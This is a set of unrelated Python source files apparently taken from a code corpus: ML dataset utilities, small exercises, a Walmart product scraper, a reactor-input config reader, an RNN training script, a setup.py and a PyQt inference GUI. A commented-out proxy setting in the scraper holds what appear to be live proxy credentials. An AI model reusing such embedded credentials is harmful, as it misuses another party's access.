'-'.join(str(n) for n in corruption_levels), training_epochs, normalization_method, matrix_normalization, learning_rate)\n \n elif lvet == 'autoencoder' and not preprocess_svd:\n return '%s%f-%s-NoSVD-%s/%s-%s-%s-u%s-i%s-%s-%diterations-%s-%s-lr%f' % (sparse, sparsity_weight, dpout, activation, type_experiment, lvet, sl_technique, '-'.join(str(n) for n in user_hlayers_sizes), '-'.join(str(n) for n in item_hlayers_sizes), '-'.join(str(n) for n in corruption_levels), training_epochs, normalization_method, matrix_normalization, 
learning_rate)\r\n\r\n    elif lvet == 'randomized_svd':\r\n        return '%s-%s-%s-%d-%s-%s' % (type_experiment, lvet, sl_technique, n_factors, normalization_method, matrix_normalization)\r\n    else:\r\n        print('Invalid latent variable extraction technique.')\r\n        # raise SystemExit rather than sys.exit: 'sys' is never imported in this module\r\n        raise SystemExit(-1)\r\n\r\n# Read and prepare data\r\ndef readDataset(dataset_path, delimiter):\r\n    dataset = genfromtxt(dataset_path, delimiter=delimiter, dtype='f8')\r\n    return dataset\r\n\r\ndef saveDataset(filename, ratings_matrix, delimiter):\r\n    parent = os.path.abspath(os.path.join(filename, os.pardir))\r\n    if not os.path.isdir(parent):\r\n        os.makedirs(parent)\r\n    np.savetxt(filename, ratings_matrix, delimiter=delimiter)\r\n\r\ndef gzipDataset(input_filename, output_filename, delimiter):\r\n\r\n    data = genfromtxt(input_filename, delimiter=delimiter)\r\n\r\n    train_set_x = data\r\n    train_set_y = data\r\n\r\n    val_set_x = data\r\n    val_set_y = data\r\n\r\n    test_set_x = data\r\n    test_set_y = data\r\n\r\n    train_set = train_set_x, train_set_y\r\n    val_set = val_set_x, val_set_y\r\n    test_set = test_set_x, test_set_y\r\n\r\n    dataset = [train_set, val_set, test_set]\r\n\r\n    f = gzip.open(output_filename,'wb')\r\n    pickle.dump(dataset, f, protocol=2)\r\n    f.close()\r\n\r\ndef loadDataset(dataset):\r\n\r\n    print('... loading data')\r\n\r\n    f = gzip.open(dataset, 'rb')\r\n    train_set, valid_set, test_set = pickle.load(f)\r\n    f.close()\r\n\r\n    test_set_x, test_set_y = sharedDataset(test_set)\r\n    valid_set_x, valid_set_y = sharedDataset(valid_set)\r\n    train_set_x, train_set_y = sharedDataset(train_set)\r\n\r\n    rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),\r\n            (test_set_x, test_set_y)]\r\n    return rval\r\n\r\ndef sharedDataset(data_xy, borrow=True):\r\n    data_x, data_y = data_xy\r\n    shared_x = theano.shared(np.asarray(data_x, dtype=theano.config.floatX),\r\n                             borrow=borrow)\r\n    shared_y = theano.shared(np.asarray(data_y, dtype=theano.config.floatX),\r\n                             borrow=borrow)\r\n    return shared_x, T.cast(shared_y, 'int32')\r\n","sub_path":"ae/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"427049762","text":"pamt = int(input(\"Enter the Purchase amount : \"))\nif(pamt>=0):\n    # discount tiers (ascending): <=10000 -> 5%, <=30000 -> 10%, <=50000 -> 15%, larger -> 20%\n    if pamt <= 10000:\n        discount = pamt*0.05\n    elif pamt <= 30000:\n        discount = pamt*0.1\n    elif pamt <= 50000:\n        discount = pamt*0.15\n    else:\n        discount = pamt*0.2\n    print(\"Discount amount :\", discount)\n    print(\"Amount To be Paid by Customer : \", pamt-discount)\nelse:\n    print(\"The Amount Entry is Invalid\")\n","sub_path":"Week04AssignmentsFolder/w4_a3.py","file_name":"w4_a3.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422307277","text":"user_input = input(\"Enter a string: \")\ndigit_count = 0\nletter_count = 0\nfor ch in user_input:\n    if ch.isnumeric():\n        digit_count += 1\n    elif ch.isalpha():\n        letter_count += 1\nprint(\"\"\"\nLetters: %d\nDigits: %d\n\"\"\" % (letter_count, digit_count))","sub_path":"Task2.8.py","file_name":"Task2.8.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"26713224","text":"import json\nimport traceback\nfrom io import StringIO\nimport lxml.html as lh\nimport requests\n# from jsonpath_ng import\nfrom jsonpath_ng.ext import parse\nimport string\nimport re\n__all__ = [\"do_the_job\"]\n\ndef get_content(URL):\n    # proxy = {\"http\": \"http://10099:M9GUfa@hn4.nohodo.com:10099/\",\n    #          \"https\": \"http://10099:M9GUfa@hn4.nohodo.com:10099/\"}\n    
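# Browser-like headers: walmart.com tends to reject the default python-requests User-Agent, so a desktop Chrome UA is spoofed here (assumption based on the headers used below, not confirmed by the author).\n    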
headers = {'Connection': 'keep-alive',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}\n\n r = requests.get(URL, headers=headers, timeout=10)\n ready_str = r.text\n with open('walmartcheck.html','w') as f:\n f.write((ready_str))\n elem_tree = lh.parse(StringIO(ready_str))\n xpath = '''//*[@id = 'atf-content']'''\n elemlst = elem_tree.xpath(xpath)\n if len(elemlst) == 0:\n elemlst = re.findall('window.__WML_REDUX_INITIAL_STATE__ *= *({.*});',ready_str,re.MULTILINE|re.DOTALL)\n if len(elemlst) == 0:\n raise RuntimeError('Cannot find xpath:{} or __WML_REDUX_INITIAL_STATE__'.format(xpath))\n else:\n printable = set(string.printable)\n clean_str = ''.join(filter(lambda x: x in printable, elemlst[0]))\n else:\n printable = set(string.printable)\n clean_str=''.join(filter(lambda x: x in printable,elemlst[0].text))\n elemdict = json.loads(clean_str)\n return elemdict\n\n\ndef do_the_job(jobdict, driver=None):\n def getoffer(offerid, elemdict):\n return parse('$..product.offers.\"{}\"'.format(offerid)).find(elemdict)[0].value\n\n #jobdict = json.loads(payload_json)\n PID = jobdict['PID']\n URL = jobdict['URL']\n SKU = None\n if URL is None:\n URL = 'https://www.walmart.com/ip/{}'.format(PID)\n try:\n elemdict = get_content(URL)\n reportback = \\\n list(filter(lambda x: x.value['usItemId'] == '{}'.format(PID), parse('$..product.products.*').find(elemdict)))[\n 0].value\n if 'offers' in reportback:\n reportback['offers_feched'] = [getoffer(x, elemdict) for x in reportback['offers']]\n else:\n reportback['offers_feched'] = None\n\n retwrapper = {\n 'STATUS':'SUCCESS',\n 'PAYLOAD': json.dumps(reportback),\n }\n except:\n retwrapper = {\n 'STATUS': 'FAIL',\n 'PAYLOAD': json.dumps({'Reason':traceback.format_exc()}),\n }\n return retwrapper\n\n\nif __name__ == '__main__':\n testdict = {\"WEBSITE\":\"Walmart\",\n \"PID\": \"124269570\",\n \"SKU\": \"124269570\",\n \"URL\": \"https://www.walmart.com/ip/Round-Center-Cubic-Zirconia-Ring-Sterling-Silver-925/124269570\"}\n print(do_the_job(testdict))","sub_path":"job_by_websites/Walmart.py","file_name":"Walmart.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"598821021","text":"import os\nimport glob\nimport yaml\n\n\nclass GlobalVariables(object):\n \"\"\"\n This class will hold all the variables that are not specific to a single assembly.\n \"\"\"\n def __init__(self):\n self.assembly_file_name = ''\n self.xc_library = ''\n self.xc_set = ''\n self.universe = 100\n self.cellNumber = 100\n self.surfaceNumber = 100\n self.materialNumber = 100\n self.temperature = 0\n self.temp_adjusted_density = False\n self.temp_adjusted_volume = False\n self.clad_smear = False\n self.bond_smear = False\n self.void_per = 0\n self.file_name = ''\n self.number_generations = 0\n self.number_skipped_generations = 0\n self.number_particles_generation = 0\n self.kopts = False\n self.ksens = False\n self.assembly_perturbations = {}\n self.output_name = ''\n self.input_type = ''\n\n def read_input_file(self, assembly_name, **perturbations):\n \"\"\"Reads the yaml file for a FRIDGE input file and assigns any variables found.\"\"\"\n self.assembly_file_name = 
assembly_name\n cur_dir = os.path.dirname(__file__)\n input_dir = os.path.join(cur_dir, \"../fridge_input_file\")\n assembly_path = os.path.join(input_dir, self.assembly_file_name + '.yaml')\n assembly_file = glob.glob(assembly_path)\n print(assembly_name, assembly_file)\n print(assembly_path)\n with open(assembly_file[0], \"r\") as file:\n inputs = yaml.safe_load(file)\n\n self.file_name = inputs[\"Name\"]\n self.input_type = inputs[\"Input Type\"]\n self.output_name = inputs[\"Output File Name\"] \\\n if \"Output File Name\" in inputs else 'FRIDGe1'\n self.temperature = float(inputs[\"Temperature\"]) \\\n if 'Temperature' in inputs else 900\n self.temp_adjusted_density = bool(inputs[\"Temperature Adjusted Density\"]) \\\n if 'Temperature Adjusted Density' in inputs else False\n self.temp_adjusted_volume = bool(inputs[\"Temperature Adjusted Volume\"]) \\\n if 'Temperature Adjusted Volume' in inputs else False\n self.clad_smear = bool(inputs[\"Smear Clad\"]) \\\n if 'Smear Clad' in inputs else False\n self.bond_smear = bool(inputs[\"Smear Bond\"]) \\\n if 'Smear Bond' in inputs else False\n self.xc_library = inputs[\"XC Library\"] \\\n if 'XC Library' in inputs else ''\n self.number_generations = int(inputs[\"Number of Generations\"]) \\\n if 'Number of Generations' in inputs else 230\n self.number_skipped_generations = int(inputs[\"Number of Skipped Generations\"]) \\\n if 'Number of Skipped Generations' in inputs else 30\n self.number_particles_generation = int(float(inputs[\"Number of Particles per Generation\"])) \\\n if 'Number of Particles per Generation' in inputs else int(1e6)\n self.kopts = bool(inputs[\"Run Kinetics\"]) \\\n if 'Run Kinetics' in inputs else False\n self.ksens = bool(inputs[\"ksens\"]) \\\n if 'ksens' in inputs else False\n self.void_per = float(inputs[\"Void Percent\"]) \\\n if \"Void Percent\" in inputs else 1.0\n self.assembly_perturbations = inputs[\"Assembly Perturbations\"] \\\n if \"Assembly Perturbations\" in inputs else {}\n\n # Update for perturbations\n for k, v in perturbations.items():\n self.__setattr__(k, v)\n\n # Set the XC set depending on the temperature\n if self.temperature == 600:\n if self.xc_library == 'ENDFVII.1':\n self.xc_set = '.81c'\n elif self.xc_library == 'ENDFVII.0':\n self.xc_set = '.71c'\n elif self.xc_library == 'JEFF3.1':\n self.xc_set = '.34c'\n elif self.temperature == 900:\n if self.xc_library == 'ENDFVII.1':\n self.xc_set = '.82c'\n elif self.xc_library == 'ENDFVII.0':\n self.xc_set = '.72c'\n elif self.xc_library == 'JEFF3.1':\n self.xc_set = '.37c'\n elif self.temperature == 1200:\n if self.xc_library == 'ENDFVII.1':\n self.xc_set = '.83c'\n elif self.xc_library == 'ENDFVII.0':\n self.xc_set = '.73c'\n elif self.xc_library == 'JEFF3.1':\n self.xc_set = '.39c'\n\n def update_numbering(self):\n self.universe += 20\n self.cellNumber += 20\n self.surfaceNumber += 20\n self.materialNumber += 20\n","sub_path":"fridge/driver/global_variables.py","file_name":"global_variables.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"39842297","text":"import json\n\ndef BEGIN():\n\tres = [\"Name\",\"Age\"]\n\treturn res\n\n\ndef RUN(file_name):\n\tresult_file = file_name + \"_result\"\n\twith open(file_name + \".json\", \"r\") as input_data:\n\t\tparameters = json.load(input_data)\n\tresult = \"Hello, my name is \" + parameters[\"Name\"] + \" and I'm \" + parameters[\"Age\"] + \" years old.\"\n\tprint(result)\n\n\twith open(result_file + 
\".json\", \"w\") as output_data:\n\t\treport = {}\n\t\treport[\"title\"] = \"Test from name: \" + parameters[\"Name\"] + \" and age: \" + parameters[\"Age\"]\n\t\treport[\"result\"] = result\n\t\tjson.dump(report, output_data)","sub_path":"modules/test/module_test.py","file_name":"module_test.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"142246328","text":"# -*- coding: utf-8 -*-\r\n \r\nimport warnings\r\nfrom RNN_model import RNNTrainer\r\nimport random\r\n\r\n\r\nn = 10\r\nfor i in range(n):\r\n \r\n print('\\n')\r\n print('This is the {} run'.format(i+1))\r\n window_size, is_one_hot,is_op_factor, is_MOC_normal= 40,1,1,1\r\n Loss_function = 'SCORE'\r\n\r\n dropout_train = 0.5 ### default = 0,0.5\r\n NN_type = 'GRU' #LSTM, GRU, RNN\r\n num_layers = 2 #2\r\n sensor_feature_used = ['sensor 2', 'sensor 3', 'sensor 4', 'sensor 7', 'sensor 8', 'sensor 9',\r\n 'sensor 11', 'sensor 12', 'sensor 13', 'sensor 14', 'sensor 15',\r\n 'sensor 17', 'sensor 20', 'sensor 21']\r\n feature_used = sensor_feature_used + ['RUL']\r\n\r\n\r\n dataset_name, total_steps = 'FD001', 6000\r\n # dataset_name, total_steps = 'FD002', 6000\r\n #dataset_name, total_steps = 'FD003', 6000\r\n # dataset_name, total_steps = 'FD004', 12000\r\n \r\n\r\n if is_op_factor:\r\n feature_used += ['op factor']\r\n if is_one_hot:\r\n feature_used += [\"setting_op {}\".format(s) for s in range(1,7)]\r\n\r\n num_input = len(feature_used) - 1 #minus RUL\r\n patience = 3 #default = 3\r\n \r\n \r\n model = RNNTrainer(train_path = './data/%s/train_op.csv'%dataset_name, #train_op_normal\r\n test_path = './data/%s/test_op.csv'%dataset_name, #tets_op\r\n logger_path = './logs/',\r\n model_name = 'Turbofan_Test',\r\n dataset_name = dataset_name,\r\n train_log_interval = 100,\r\n valid_log_interval = 100,\r\n validation_split = 0.3,\r\n use_script=True,\r\n lr = 1e-4, #default = 4\r\n max_lr = 1e-2, #default = 2\r\n total_steps = total_steps,\r\n number_steps_train = window_size, \r\n hidden_size = 256,\r\n num_layers = num_layers,\r\n cell_type = NN_type, # neural network strature selected default = 'GRU'\r\n feature_used = feature_used,\r\n sensor_feature_used = sensor_feature_used,\r\n dropout_train = dropout_train,\r\n kernel_size=10,\r\n batch_size = 256, #default=256\r\n num_epoch = 100, #int(random.uniform(3, 30)), # epochs for training #default = 100\r\n number_features_input = num_input,\r\n number_features_output = 1,\r\n loss_function = Loss_function, \r\n optimizer = 'Adam',\r\n normalizer = 'Standardization',\r\n use_scheduler = 3, # use_scheduler = 3 : using cycling learning rate\r\n use_cuda = True,\r\n is_MOC_normal = is_MOC_normal\r\n )\r\n \r\n \r\n \r\n warnings.filterwarnings(\"ignore\")\r\n print('use_cuda:', model.use_cuda)\r\n \r\n model.train(patience) #default patience = 3\r\n\r\n\r\n \r\n import os, json, shutil\r\n import numpy as np\r\n import pandas as pd\r\n \r\n print(model.filelogger.path)\r\n model.get_best('load')\r\n \r\n predictions, labels = model.predict()\r\n # print(predictions.shape, labels.shape)\r\n df_test, results, mse, mae, r2, score, cra = model.postprocess(predictions, labels)\r\n \r\n \r\n # save the model with best results\r\n shutil.copyfile(model.get_best('save'),'./best/%s/%.3f.pth'%(dataset_name,score))\r\n print(\r\n dataset_name, '\\n',\r\n '='*36, '\\n',\r\n 'Score:\\t\\t%.4f'% score, '\\n',\r\n 'Accuracy:\\t%.4f'% (results['Accuracy'].mean()*100) , '\\n',\r\n 'RMSE:\\t\\t%.4f'% 
np.sqrt(mse), '\\n',\r\n 'mse:\\t\\t%.4f'% mse, '\\n',\r\n 'mae:\\t\\t%.4f'% mae, '\\n',\r\n 'score_avg:\\t%.4f'% results['Score'].mean(), '\\n',\r\n 'R2:\\t\\t%.4f'% r2, '\\n',\r\n 'CRA:\\t\\t%.4f'% cra, '\\n',\r\n 'dropout:\\t\\t%.1f'% dropout_train, '\\n',\r\n 'window_size:', window_size, '\\n',\r\n 'loss function', Loss_function, '\\n',\r\n 'NN_type',NN_type,'\\n',\r\n 'NN layers',num_layers,'\\n',\r\n 'Num feature',num_input,'\\n',\r\n 'patience',patience,'\\n',\r\n 'is_MOC_normal',is_MOC_normal,'\\n',\r\n 'feature used',feature_used,'\\n',\r\n '='*36)\r\n \r\n \r\n # save performance in txt file \r\n doc=open('./results/%s/2.txt'\r\n %(dataset_name),'a') \r\n print('\\n',file = doc)\r\n print(dataset_name,file=doc)\r\n print('='*36,file=doc)\r\n print('Score:\\t\\t%.4f'% score,file=doc)\r\n print('Accuracy:\\t%.4f'% (results['Accuracy'].mean()*100),file=doc )\r\n print('RMSE:\\t\\t%.4f'% np.sqrt(mse),file=doc)\r\n print('mse:\\t\\t%.4f'% mse,file=doc)\r\n print('mae:\\t\\t%.4f'% mae,file=doc)\r\n print('score_avg:\\t%.4f'% results['Score'].mean(),file=doc)\r\n print('R2:\\t\\t%.4f'% r2,file=doc)\r\n print('CRA:\\t\\t%.4f'% cra,file=doc)\r\n print('dropout:\\t\\t%.1f'% dropout_train,file=doc)\r\n print('window_size: ', window_size,file=doc)\r\n print('loss function: ', Loss_function,file=doc)\r\n print('NN_type: ', NN_type,file=doc)\r\n print('NN layers: ',num_layers,file=doc)\r\n print('Num feature: ',num_input,file=doc)\r\n print('patience: ',patience,file=doc)\r\n print('is_MOC_normal: ',is_MOC_normal,file=doc)\r\n print('feature used: ',feature_used,file=doc)\r\n print('='*36,file=doc)\r\n\r\n doc.close( )\r\n \r\n if not os.path.exists('./results/%s/Score(%.3f)W(%s)OP_factor(%s)one-hot(%s)RMSE(%.3f).txt'\r\n %(dataset_name,score,window_size,is_op_factor,is_one_hot,np.sqrt(mse))):\r\n os.rename('./results/%s/2.txt'\r\n %(dataset_name),'./results/%s/Score(%.3f)W(%s)OP_factor(%s)one-hot(%s)RMSE(%.3f).txt'\r\n %(dataset_name,score,window_size,is_op_factor,is_one_hot,np.sqrt(mse)),)\r\n print(\"performace results have been saved!\")\r\n # save results : predicted RUL and Real RUL\r\n dataframe = pd.DataFrame({'predictede RUL':results['Predicted_RUL'],'real_RUL':results['True_RUL']})\r\n \r\n # save the reults about 'predicted RUL' and 'real RUL'\r\n dataframe.to_csv(\"./results/%s/Test results_Score%.4fRMSE%.4f.csv\"%(dataset_name,score,np.sqrt(mse)),sep=',')\r\n df_test.to_csv('./results/{}/All resutls_Score{:.4f}RMSE{:.4f}.csv'.format(dataset_name,score,np.sqrt(mse)))\r\n \r\n print(\"RUL results have been saved\",'\\n')\r\n else:\r\n print('similary results!')\r\n\r\n\r\n","sub_path":"run_code.py","file_name":"run_code.py","file_ext":"py","file_size_in_byte":6584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"432652284","text":"\n#!/usr/bin/python\n\n# Copyright 2018 Altran\n# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# THIS FILE IS MANAGED BY THE 
GLOBAL REQUIREMENTS REPO - DO NOT EDIT\n# Copyright 2011 OpenStack, LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nfrom setuptools import setup, find_packages\n\nwith open('requirements.txt') as f:\n    requirements = f.read().splitlines()\n\n# enforce the interpreter floor with a proper exception; raising a bare\n# string is a TypeError on modern Pythons, and the original duplicate\n# 'elif sys.version_info < (2, 7)' branch was unreachable\nif sys.version_info < (2, 7):\n    raise RuntimeError('Must use python 2.7 or greater')\n\nwith open('README.rst') as f:\n    long_description = f.read()\n\nsetup(\n    name='EPEPIN API Server',\n    version='1.0',\n    author='Asgard Team',\n    author_email='',\n    description='Ericcson Cucumber Templates API Server',\n    long_description=long_description,\n    install_requires=requirements,\n    packages=find_packages(exclude=['tests', '*.tests', '*.tests.*']),\n    data_files=[('epepin_api/config', ['epepin_api/config/epepin_server.cfg'])],\n    package_data={'': ['schemas/*.json']},\n    license='Apache License 2.0',\n    classifiers=[\n        \"Development Status :: 1 - Planning\",\n        \"Environment :: Console\",\n        \"Intended Audience :: Developers\",\n        \"Intended Audience :: Information Technology\",\n        \"Intended Audience :: System Administrators\",\n        \"License :: OSI Approved :: Apache Software License\",\n        \"Natural Language :: English\",\n        \"Operating System :: POSIX :: Linux\",\n        \"Programming Language :: Python\",\n        \"Programming Language :: Python :: 2\",\n        \"Programming Language :: Python :: 2.7\",\n        \"Topic :: System\",\n        \"Framework :: Flask\",\n    ],\n    entry_points={\n        'console_scripts': [\n            'epepin=epepin_api.server:main',\n        ],\n    },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515430146","text":"#!/usr/bin/env python3\n# Project Euler problem 33\nimport time\nimport sys\nsys.path.append('..')\nfrom functions import gcd\nstart_time = time.time()\n\nshared_digits = []\nfor N in range(10, 100):\n    for D in range(N+1, 100):\n        for digit in str(N):\n            if digit != '0' and digit in str(D):\n                shared_digits.append((N, D))\n                break\n\n\ndef digit_cancel(N, D):\n\n    N = str(N)\n    D = str(D)\n\n    for i, n_digit in enumerate(N):\n        for j, d_digit in enumerate(D):\n            if n_digit == d_digit:\n                n = N[1-i]\n                d = D[1-j]\n                break\n\n    return int(n), int(d)\n\n\nanswer = []\nfor N, D in shared_digits:\n\n    n, d = digit_cancel(N, D)\n\n    # skip fractions whose cancelled denominator is zero\n    if D == 0 or d == 0:\n        pass\n\n    elif N / D == n / d:\n        answer.append((N, D))\n\nn = d = 1\nfor i in answer:\n    n *= i[0]\n    d *= i[1]\n\n# denominator in lowest common form\nanswer = int(d / gcd(n, d))\n\nend_time = time.time()\nrun_time = end_time - start_time\nprint(\"-------------------------------------------\")\nprint(\"|  Solution to Project Euler problem 33   |\")\nprint(\"-------------------------------------------\")\nprint(\"Question: Find the value of the denominator of the product of the four non-trivial digit-cancelling fractions, given in lowest common terms.\")\nprint(\"Answer: {:d}\".format(answer))\nprint(\"Wall time: {:3.5f} 
seconds\".format(run_time))\n\n","sub_path":"33/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"565089614","text":"############################################################################\r\n## Author: Jiading Fang\r\n## Company: Mech-mind\r\n############################################################################\r\n\r\nimport sys\r\nimport os\r\nimport time\r\nimport subprocess\r\nfrom PyQt5.QtCore import QFile, QIODevice, QTextStream\r\nfrom PyQt5.QtWidgets import (QWidget, QLineEdit, QLabel,\r\n QGridLayout, QApplication, QPushButton, QFileDialog,\r\n QHBoxLayout, QVBoxLayout, QMessageBox, QComboBox)\r\n\r\nfrom Image_comparer.progressWindow import progressWindow\r\nfrom Image_comparer.Comparer import Comparer\r\nimport platform\r\n\r\nfrom enum import Enum\r\n\r\nclass Status(Enum):\r\n initial = 1\r\n infering = 2\r\n infered = 3\r\n\r\nclass Inferer(QWidget):\r\n\r\n def __init__(self, number_of_initial_models = 1):\r\n\r\n super().__init__()\r\n self.widget_id_generate_list = list(range(100000))\r\n self.widget_id_generate_list.reverse()\r\n plat_form = platform.system()\r\n if plat_form == 'Linux':\r\n self.default_script_path = os.path.expanduser(\"~/projects/MaskRCNN-Tensorflow/samples/coco/coco_infer.py\")\r\n elif plat_form == 'Windows':\r\n self.default_script_path =os.path.expanduser(\"D:/projects/MaskRCNN-Tensorflow/samples/coco/coco_infer.py\")\r\n\r\n self.initUI(number_of_initial_models)\r\n\r\n self.status = Status.initial\r\n\r\n\r\n def initUI(self, number_of_initial_models):\r\n\r\n self.widget_id_save_list = []\r\n\r\n # create header widgets\r\n self.source_image_folder_button = QPushButton('Source Image Folder')\r\n self.source_image_folder_lineEdit = QLineEdit()\r\n self.depth_image_folder_button = QPushButton('Depth Image Folder')\r\n self.depth_image_folder_lineEdit = QLineEdit()\r\n self.model_config_button = QPushButton('Model Config')\r\n self.model_config_lineEdit = QLineEdit()\r\n self.infer_script_path_button = QPushButton('Infer Script Path')\r\n self.infer_script_path_lineEdit = QLineEdit()\r\n\r\n self.color_type_label = QLabel('Color Type')\r\n self.color_type_combobox = QComboBox()\r\n self.color_type_combobox.addItem('instance')\r\n self.color_type_combobox.addItem('class')\r\n\r\n self.python_version_label = QLabel('Python Version')\r\n self.python_version_combobox = QComboBox()\r\n self.python_version_combobox.addItem('python')\r\n self.python_version_combobox.addItem('python2')\r\n self.python_version_combobox.addItem('python3')\r\n\r\n source_image_holder_hbox = QHBoxLayout()\r\n source_image_holder_hbox.addWidget(self.source_image_folder_button)\r\n source_image_holder_hbox.addWidget(self.source_image_folder_lineEdit)\r\n\r\n depth_image_holder_hbox = QHBoxLayout()\r\n depth_image_holder_hbox.addWidget(self.depth_image_folder_button)\r\n depth_image_holder_hbox.addWidget(self.depth_image_folder_lineEdit)\r\n\r\n model_config_hbox = QHBoxLayout()\r\n model_config_hbox.addWidget(self.model_config_button)\r\n model_config_hbox.addWidget(self.model_config_lineEdit)\r\n\r\n infer_script_path_hbox = QHBoxLayout()\r\n infer_script_path_hbox.addWidget(self.infer_script_path_button)\r\n infer_script_path_hbox.addWidget(self.infer_script_path_lineEdit)\r\n\r\n infer_settings_hbox = QHBoxLayout()\r\n infer_settings_hbox.addWidget(self.color_type_label)\r\n infer_settings_hbox.addWidget(self.color_type_combobox)\r\n 
infer_settings_hbox.addWidget(self.python_version_label)\r\n infer_settings_hbox.addWidget(self.python_version_combobox)\r\n\r\n self.header_vbox = QVBoxLayout()\r\n self.header_vbox.addLayout(source_image_holder_hbox)\r\n self.header_vbox.addLayout(depth_image_holder_hbox)\r\n self.header_vbox.addLayout(model_config_hbox)\r\n self.header_vbox.addLayout(infer_script_path_hbox)\r\n self.header_vbox.addLayout(infer_settings_hbox)\r\n\r\n self.model_path_buttons = {}\r\n self.model_path_lineEdits = {}\r\n self.save_folder_buttons = {}\r\n self.save_folder_lineEdits = {}\r\n self.delete_buttons = {}\r\n\r\n for which_model in range(number_of_initial_models):\r\n self.buttonClickedAddModel()\r\n\r\n self.add_model_button = QPushButton('Add Model')\r\n self.infer_button = QPushButton('Infer')\r\n\r\n # set up signals and slots for widgets\r\n self.source_image_folder_button.clicked.connect(self.buttonClickedGetSourceImageFolder)\r\n self.depth_image_folder_button.clicked.connect(self.buttonClickedGetDepthImageFolder)\r\n self.model_config_button.clicked.connect(self.buttonClickedGetModelConfig)\r\n self.infer_script_path_button.clicked.connect(self.buttonClickedGetInferScriptPath)\r\n self.add_model_button.clicked.connect(self.buttonClickedAddModel)\r\n self.infer_button.clicked.connect(self.buttonClickedInfer)\r\n\r\n # create window layout\r\n self.header_grid_layout = QGridLayout()\r\n self.header_button_hbox = QHBoxLayout()\r\n self.window_vbox = QVBoxLayout()\r\n\r\n # set up initial header layout\r\n self.header_button_hbox.addWidget(self.add_model_button)\r\n self.header_button_hbox.addStretch(1)\r\n self.header_button_hbox.addWidget(self.infer_button)\r\n\r\n self.window_vbox.addLayout(self.header_vbox)\r\n self.window_vbox.addLayout(self.header_button_hbox)\r\n\r\n # set up window display\r\n self.setLayout(self.window_vbox)\r\n self.setWindowTitle('Inferer')\r\n\r\n # infered flag\r\n self.infered_flag = False\r\n # set finished flag\r\n self.finished_flag = False\r\n\r\n def buttonClickedGetSourceImageFolder(self):\r\n\r\n folder_name = QFileDialog.getExistingDirectory(self, 'Select Source Image Folder')\r\n self.source_image_folder_lineEdit.setText(str(folder_name))\r\n\r\n def buttonClickedGetDepthImageFolder(self):\r\n\r\n folder_name = QFileDialog.getExistingDirectory(self, 'Select Depth Image Folder')\r\n self.depth_image_folder_lineEdit.setText(str(folder_name))\r\n\r\n def buttonClickedGetModelConfig(self):\r\n\r\n config_name = QFileDialog.getOpenFileName(self, 'Select Model Config', self.tr(\"*yml\"))\r\n self.model_config_lineEdit.setText(str(config_name[0]))\r\n\r\n def buttonClickedGetInferScriptPath(self):\r\n\r\n path_name = QFileDialog.getOpenFileName(self, 'Select Infer Script', self.default_script_path)\r\n self.infer_script_path_lineEdit.setText(str(path_name[0]))\r\n\r\n def buttonClickedGetModelPath(self, widget_id):\r\n\r\n path_name = QFileDialog.getOpenFileName(self, 'Select Model Path')\r\n self.model_path_lineEdits[widget_id].setText(str(path_name[0]))\r\n\r\n def buttonClickedGetSaveFolder(self, widget_id):\r\n\r\n folder_name = QFileDialog.getExistingDirectory(self, 'Select Infer results Save Folder')\r\n self.save_folder_lineEdits[widget_id].setText(str(folder_name))\r\n\r\n def buttonClickedAddModel(self):\r\n\r\n widget_id = self.widget_id_generate_list.pop()\r\n\r\n #number_of_existing_models = len(self.model_path_buttons)\r\n self.widget_id_save_list.append(widget_id)\r\n\r\n # create new widgets\r\n new_model_path_button = QPushButton('Model Path')\r\n 
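# Each row's widgets are stored in dicts keyed by a unique widget_id so that buttonClickedDeleteModel can later remove any row independently.\r\n        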
